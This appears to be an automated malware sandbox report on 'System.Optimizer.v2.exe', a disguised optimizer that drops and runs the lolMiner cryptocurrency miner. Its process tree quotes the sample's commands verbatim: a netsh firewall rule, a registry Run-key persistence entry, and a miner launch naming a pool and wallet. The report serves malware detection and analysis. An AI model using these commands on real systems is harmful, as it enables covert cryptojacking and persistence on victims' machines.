ccc378efd93655fa275f6689c7062f3ed7c807d7548fb38e25254d4967f49232

Analysis

max time kernel
46s
max time network
40s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
23/02/2024, 19:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

System.Optimizer.v2.exe
Size

7.3MB
MD5

4799ecfa1c49e7717b7ac1ba1eef2f98
SHA1

99a7fa53bb524bf2438773f742c0e9371c30ac5d
SHA256

ccc378efd93655fa275f6689c7062f3ed7c807d7548fb38e25254d4967f49232
SHA512

37ad1e0d2ec00b81ed4e595ab566c8db26d105b6c057a5d0a0e5f9af232b6a8f7dd4c9e61ae26eab057d61522dc269490496c20d4cdb57478cfeb457aa59955b
SSDEEP

196608:9BZY3aF3loDfyGZ21X5Sp6GemDMPwuWwJnPGihnRE+:lY3aoDfD0pfaMPhVK+

Score

8^/10

evasion upx

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1696	netsh.exe

Executes dropped EXE 1 IoCs

pid	Process
2108	lolMiner.exe

Loads dropped DLL 14 IoCs

pid	Process
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe
4680	System.Optimizer.v2.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000023179-96.dat	upx
behavioral1/files/0x0006000000023179-95.dat	upx
behavioral1/memory/2108-97-0x00007FF75A3E0000-0x00007FF75FEE0000-memory.dmp	upx

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4512 wrote to memory of 4680	4512	System.Optimizer.v2.exe	87
PID 4512 wrote to memory of 4680	4512	System.Optimizer.v2.exe	87
PID 4680 wrote to memory of 1696	4680	System.Optimizer.v2.exe	88
PID 4680 wrote to memory of 1696	4680	System.Optimizer.v2.exe	88
PID 4680 wrote to memory of 4520	4680	System.Optimizer.v2.exe	90
PID 4680 wrote to memory of 4520	4680	System.Optimizer.v2.exe	90
PID 4680 wrote to memory of 2108	4680	System.Optimizer.v2.exe	91
PID 4680 wrote to memory of 2108	4680	System.Optimizer.v2.exe	91

C:\Users\Admin\AppData\Local\Temp\System.Optimizer.v2.exe
"C:\Users\Admin\AppData\Local\Temp\System.Optimizer.v2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4512
- C:\Users\Admin\AppData\Local\Temp\System.Optimizer.v2.exe
  "C:\Users\Admin\AppData\Local\Temp\System.Optimizer.v2.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4680
- - C:\Windows\SYSTEM32\netsh.exe
    netsh advfirewall firewall add rule name="BlockProgram" dir=out program="C:\Users\Admin\AppData\Local\Temp\data\1.84\lolMiner.exe" profile=any action=allow
    3⤵
    - Modifies Windows Firewall
    PID:1696
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SystemOptimizer /t REG_SZ /d 'C:\Users\Admin\AppData\Local\Temp\data\1.84\lolMiner.exe -a GRAM --pool api-pool.gramcoin.org:443 --user UQBvLKd7IsKoB-pT89OBNKYpK1-ugvLF5335J3q8kRR8P8H0 '
    3⤵
    PID:4520
- - C:\Users\Admin\AppData\Local\Temp\data\1.84\lolMiner.exe
    .\data\1.84\lolMiner.exe -a GRAM --pool api-pool.gramcoin.org:443 --user UQBvLKd7IsKoB-pT89OBNKYpK1-ugvLF5335J3q8kRR8P8H0
    3⤵
    - Executes dropped EXE
    PID:2108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI45122\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\_bz2.pyd

Filesize
82KB

MD5
a62207fc33140de460444e191ae19b74

SHA1
9327d3d4f9d56f1846781bcb0a05719dea462d74

SHA256
ebcac51449f323ae3ae961a33843029c34b6a82138ccd9214cf99f98dd2148c2

SHA512
90f9db9ee225958cb3e872b79f2c70cb1fd2248ebaa8f3282afff9250285852156bf668f5cfec49a4591b416ce7ebaaac62d2d887152f5356512f2347e3762b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\_decimal.pyd

Filesize
189KB

MD5
70233746f113b6a0ae890b075cc17145

SHA1
bec659e25b88178f43216dad23dd535f16d7e7b1

SHA256
ca91ace4a2fece03b2ec3dba209511a71086dd2ca866581704e37651cf78528d

SHA512
001d20cecd7e652856eb63751c3fc19c67379cf01e76919c18d60b8abd87eac5fc4bd50a21a07cd33af82f671bc2ba7fc953ef8a1b129569f8154c90aa77e2ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\_hashlib.pyd

Filesize
63KB

MD5
787b82d4466f393366657b8f1bc5f1a9

SHA1
658639cddda55ac3bfc452db4ec9cf88851e606b

SHA256
241322647ba9f94bdc3ae387413ffb57ae14c8cf88bd564a31fe193c6ca43e37

SHA512
afcf66962958f38eec8b591aa30d380eb0e1b41028836058ff91b4d1472658de9fba3262f5c27ba688bd73da018e938f398e45911cd37584f623073067f575b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\_lzma.pyd

Filesize
155KB

MD5
0c7ea68ca88c07ae6b0a725497067891

SHA1
c2b61a3e230b30416bc283d1f3ea25678670eb74

SHA256
f74aaf0aa08cf90eb1eb23a474ccb7cb706b1ede7f911daf7ae68480765bdf11

SHA512
fd52f20496a12e6b20279646663d880b1354cffea10793506fe4560ed7da53e4efba900ae65c9996fbb3179c83844a9674051385e6e3c26fb2622917351846b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\_queue.pyd

Filesize
31KB

MD5
06248702a6cd9d2dd20c0b1c6b02174d

SHA1
3f14d8af944fe0d35d17701033ff1501049e856f

SHA256
ac177cd84c12e03e3a68bca30290bc0b8f173eee518ef1fa6a9dce3a3e755a93

SHA512
5b22bbff56a8b48655332ebd77387d307f5c0a526626f3654267a34bc4863d8afaf08ff3946606f3cf00b660530389c37bdfac91843808dbebc7373040fec4c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\_socket.pyd

Filesize
77KB

MD5
26dd19a1f5285712068b9e41808e8fa0

SHA1
90c9a112dd34d45256b4f2ed38c1cbbc9f24dba5

SHA256
eaabf6b78840daeaf96b5bdbf06adf0e4e2994dfeee5c5e27fefd824dbda5220

SHA512
173e1eda05d297d7da2193e8566201f05428437adcac80aecefe80f82d46295b15ce10990b5c080325dc59a432a587eef84a15ec688a62b82493ad501a1e4520

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\_ssl.pyd

Filesize
157KB

MD5
ab0e4fbffb6977d0196c7d50bc76cf2d

SHA1
680e581c27d67cd1545c810dbb175c2a2a4ef714

SHA256
680ad2de8a6cff927822c1d7dd22112a3e8a824e82a7958ee409a7b9ce45ec70

SHA512
2bff84a8ec7a26dde8d1bb09792ead8636009c8ef3fa68300a75420197cd7b6c8eaaf8db6a5f97442723e5228afa62961f002948e0eeee8c957c6517547dffba

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\_ssl.pyd

Filesize
27KB

MD5
5dfe0ec7595022ff20ae37a35d1e9e8a

SHA1
f1419b7b3a15afb0254042ca53c74b1b7366921f

SHA256
b36fae213319078828a65caf3ecdca9675846b2aecc8d5e676c279b9d2b5e9c3

SHA512
87f08b84a8cdd562863faff09c3de77f8b445f42be0b9835a9d74a7348e7018d93c3b9bc2d3fc71bd33a34dfe8bd86b0507147a2efa529c4222b53bb67af6e66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\base_library.zip

Filesize
386KB

MD5
f5bc5622a5241a65732cdc5827bda72a

SHA1
ff6715d8599ce0212466a0615af598305f93e7f4

SHA256
294fc33974f301be0e2f85c7f197643e658d12c9ecabe72f9de5a4b42e1c0bbf

SHA512
12fc1a25ce960c954bdd0a22fad15925c7851c7b893f4e59dd778de2bf7b4808d18004e481aeffdc835109f01073e85b3a1d33b867ee19e3f7fb16c9a143c36f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\certifi\cacert.pem

Filesize
285KB

MD5
d3e74c9d33719c8ab162baa4ae743b27

SHA1
ee32f2ccd4bc56ca68441a02bf33e32dc6205c2b

SHA256
7a347ca8fef6e29f82b6e4785355a6635c17fa755e0940f65f15aa8fc7bd7f92

SHA512
e0fb35d6901a6debbf48a0655e2aa1040700eb5166e732ae2617e89ef5e6869e8ddd5c7875fa83f31d447d4abc3db14bffd29600c9af725d9b03f03363469b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\charset_normalizer\md.cp311-win_amd64.pyd

Filesize
10KB

MD5
723ec2e1404ae1047c3ef860b9840c29

SHA1
8fc869b92863fb6d2758019dd01edbef2a9a100a

SHA256
790a11aa270523c2efa6021ce4f994c3c5a67e8eaaaf02074d5308420b68bd94

SHA512
2e323ae5b816adde7aaa14398f1fdb3efe15a19df3735a604a7db6cadc22b753046eab242e0f1fbcd3310a8fbb59ff49865827d242baf21f44fd994c3ac9a878

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

Filesize
116KB

MD5
9ea8098d31adb0f9d928759bdca39819

SHA1
e309c85c1c8e6ce049eea1f39bee654b9f98d7c5

SHA256
3d9893aa79efd13d81fcd614e9ef5fb6aad90569beeded5112de5ed5ac3cf753

SHA512
86af770f61c94dfbf074bcc4b11932bba2511caa83c223780112bda4ffb7986270dc2649d4d3ea78614dbce6f7468c8983a34966fc3f2de53055ac6b5059a707

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\libcrypto-1_1.dll

Filesize
207KB

MD5
714577f3fd0d1ccb3bdfd9371806778f

SHA1
1412d69248b16bcbfa5e53acb4f7ba83f33bb568

SHA256
b7f59a55c57ba236e2bc20d2c5ad2d5e68409b78d49ccb443301e17086a1e8e8

SHA512
03ad24a9aacfacd36a99ed1199f5be768547fba05e95057b1cb19fd568fd4506a6995c2b8561c62bb2b630feca4914b988120e0ed7358c443dd442c14db5b603

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\libcrypto-1_1.dll

Filesize
3.1MB

MD5
67152cfafbebee2819f3565626dba94a

SHA1
f728a02ef527cb775271a76ae306a8b75b0fc39c

SHA256
22a51340a6b5e036c4fcecc0e1894da16b4787d032c9a3c494217b919c75d324

SHA512
dc8215d3303430d41dab96cf8eb80cfa08acc1bb29095ecefe3fde97ee08e3105ecfab60068d6d923e262af7c6c138f37f0fec88a08b1576b4f68d4d0f3d1082

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\libssl-1_1.dll

Filesize
175KB

MD5
54cb5fa358fbb2dfa60d4d9511bf5bc9

SHA1
f4f853e90d35b3cb67fccb7d9dcfdb194d6c63d8

SHA256
e7993a6bf8beac9d40b6adb943d3e005f0a9e11c5e8ccaaed19494dd24c56c48

SHA512
4d38c90088982c549ad939b7adbb404b2e5f9dbb00fee71fa45b2b57701a7b5961e44a3ea8a0598fac597135e986fe5ef0e649383c012a6d0532f1f805e52443

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\libssl-1_1.dll

Filesize
688KB

MD5
bec0f86f9da765e2a02c9237259a7898

SHA1
3caa604c3fff88e71f489977e4293a488fb5671c

SHA256
d74ce01319ae6f54483a19375524aa39d9f5fd91f06cf7df238ca25e043130fd

SHA512
ffbc4e5ffdb49704e7aa6d74533e5af76bbe5db297713d8e59bd296143fe5f145fbb616b343eed3c48eceaccccc2431630470d8975a4a17c37eafcc12edd19f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\python311.dll

Filesize
2.7MB

MD5
f0f48723e88d3f901a05201cfabe2afc

SHA1
e512f510a88bd45399d117da9e93e63896ed5d1f

SHA256
eb8790b3fa2c23ed9e29b19a1af8630a3cd6e6cad918fd71be76b1cd1c06430d

SHA512
f580bac60b65ba9fe6dde2df535e97165f00230ca035cbdf9531dd19a45b0e4d0f5dcd64377145baebbae08e7b732efec1f948c5c57726a2abd1420a5dcb8281

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\python311.dll

Filesize
490KB

MD5
b8040090b12cec0aa07d8936aea025e1

SHA1
34f20ba778cbcaa92e51cd5fad1986de7ad784b6

SHA256
5b1108b3a9e0373ac9cae5cf2d55e3246ded0381ef548e7380c5c817c2179b72

SHA512
7eda58a37066d424e24b2141f3237bbfbb08fdcb64bb8d0580174f5e81b49a36f3163fcf1148fc44b5cac8cda8fbcac86ae60ab12833312be859e93b230529ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\select.pyd

Filesize
29KB

MD5
756c95d4d9b7820b00a3099faf3f4f51

SHA1
893954a45c75fb45fe8048a804990ca33f7c072d

SHA256
13e4d9a734a453a3613e11b6a518430099ad7e3d874ea407d1f9625b7f60268a

SHA512
0f54f0262cf8d71f00bf5666eb15541c6ecc5246cd298efd3b7dd39cdd29553a8242d204c42cfb28c537c3d61580153200373c34a94769f102b3baa288f6c398

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\unicodedata.pyd

Filesize
221KB

MD5
38600074fe218525ff44ce65a74e6ff5

SHA1
726cb3123a63bfa605bcd1484c2cf77e3f0e71f0

SHA256
4d769c086ac756fe2e21cc763f26504f07ee18cf92b3d61266502622332b6ff9

SHA512
f9dc651267713ca311b069b22b80dd0404992b57cc03163bc652592c4cc26252a841161bb1bc7eff0b2be47e2ecf7498d3ecfb54497c7f2811975c6846faf8e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45122\unicodedata.pyd

Filesize
1.1MB

MD5
58f7988b50cba7b793884f580c7083e1

SHA1
d52c06b19861f074e41d8b521938dee8b56c1f2e

SHA256
e36d14cf49ca2af44fae8f278e883341167bc380099dac803276a11e57c9cfa1

SHA512
397fa46b90582f8a8cd7df23b722204c38544717bf546837c45e138b39112f33a1850be790e248fca5b5ecd9ed7c91cd1af1864f72717d9805c486db0505fb9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\data\1.84\lolMiner.exe

Filesize
1.6MB

MD5
d9691836381fdfc334ed2b6594485381

SHA1
e9601e46304dfaaebd8f50a3674776cd85f98b76

SHA256
f01ec8ee5c9413ecc846aecb90899105587e5291c5194e855547cf0ce931711a

SHA512
237677a6ff0c93588947745f50b2fed8c1d8fa38015d13ed0e7655250bacfc573d96905969f4ee9236703e734ff9f325b229270214699bd70bdf928ad6c32c54

Download Submit
C:\Users\Admin\AppData\Local\Temp\data\1.84\lolMiner.exe

Filesize
1.4MB

MD5
fc3d905cd6227d7daa0e670fedfe968d

SHA1
dde7140b2b7739ba9004c0b1c1dc1fa2a67c6001

SHA256
1951c2267dff35f8eeadf27e3c885d66a6caaf29d49e5d1032fb579dc77cc74f

SHA512
06d5d0d2c083e790e582285e70086f8cbe0a754d4d6bb55d30cbe2c06544b5e8fe6b9aca8fb0faa7212397ee79b5e1d9cb6f5f4b2b103506da039d7bc9be63d0

Download Submit
memory/2108-97-0x00007FF75A3E0000-0x00007FF75FEE0000-memory.dmp

Filesize
91.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads